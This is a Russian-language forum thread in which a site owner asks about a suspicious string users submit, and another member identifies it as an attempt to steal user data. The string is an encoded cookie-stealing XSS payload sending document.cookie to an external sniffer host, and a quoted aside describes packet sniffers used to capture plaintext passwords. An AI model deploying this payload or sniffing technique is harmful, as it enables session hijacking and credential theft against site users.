Добавляют в серфинг , тех поддержка и т.д.

[emu400]

Всем привет! Что это такое?
&¦amp¦lt&¦amp¦brvbar¦script&¦amp¦gt&¦amp¦brvbar¦img = new Image()&¦amp¦brvbar¦ img.src = &¦amp¦quot&¦amp¦brvbar¦http://osniffer.pro/S6yz4ANG45_1.gif?cookie=&¦amp¦quot&¦amp¦brvbar¦+document.cookie&¦amp¦brvbar¦&¦amp¦lt&¦amp¦brvbar¦/script&¦amp¦gt&¦amp¦brvbar¦

 

[pligin]

Всем привет! Что это такое?
&¦amp¦lt&¦amp¦brvbar¦script&¦amp¦gt&¦amp¦brvbar¦img = new Image()&¦amp¦brvbar¦ img.src = &¦amp¦quot&¦amp¦brvbar¦http://osniffer.pro/S6yz4ANG45_1.gif?cookie=&¦amp¦quot&¦amp¦brvbar¦+document.cookie&¦amp¦brvbar¦&¦amp¦lt&¦amp¦brvbar¦/script&¦amp¦gt&¦amp¦brvbar¦

Немного из прошлого

Спойлер: Снифферы

Снифферы — это проги, которые перехватываютв весь сетевой трафик. Снифферы полезны для диагностики сети (для админов) и для перехвата паролей (понятно для кого). Например если ты получил доступ к одной сетевой машине и установил там сниффер, то скоро все пароли от их подсети будут твои. Снифферы ставят сетевую карту в прослушивающий режим (PROMISC).То есть они получают все пакеты. В локалке можно перехватывать все отправляемые пакеты со всех машин (если вы не разделены всякими хабами), так как там практикуется широковещание.
Снифферы могут перехватывать все
пакеты (что очень неудобно, ужасно быстро переполняется лог файл,
зато для более детального анализа сети самое оно) или только первые байты от всяких ftp,telnet,pop3 и т.д. (это самое веселое, обычно примерно в первых 100 байтах содержится имя и пароль). Снифферов сейчас развелось… Множество снифферов есть
как под Unix, так и под Windows (даже под DOS есть).
Снифферы могут поддерживать только определенную ось (например linux_sniffer.c,который поддерживает Linux), либо несколько (например Sniffit, работает с BSD, Linux, Solaris). Снифферы так разжились из-за того, что пароли передаются по сети открытым текстом.
Таких служб уйма. Это telnet, ftp, pop3, www и т.д. Этими службами пользуется уйма народу. После бума снифферов начали появляться различные алгоритмы шифрования этих протоколов. Появился SSH (альтернатива
telnet, поддерживающий шифрование), SSL(Secure Socket Layer — разработка Netscape, способная зашифровать
www сеанс). Появились всякие Kerberous, VPN(Virtual Private Network). Заюзались некие AntiSniff’ы, ifstatus’ы и т.д. Но это в корне не изменило положения. Службы, которые использую передачу пароля plain text’ом юзаются во всю. Поэтому сниффать еще долго будут.

 

[emu400]

а че делать то надо ? или это не страшно?

 

[pligin]

а че делать то надо ? или это не страшно?

удалять и банить этих ушлепков

 

[emu400]

ну это не дыры?

 

[pligin]

ну это не дыры?

просто пытаются угнать данные пользователей

 

[emu400]

а как закрыть доступ для них?

 

[emu400]

или это не возможно?

 

[pligin]

а как закрыть доступ для них?

или это не возможно?

ты же модерируешь добавляемые ссылки? просто удаляй их...
бань пользователей...
напиши регулярку, которая будет проверять правильность написания ссылки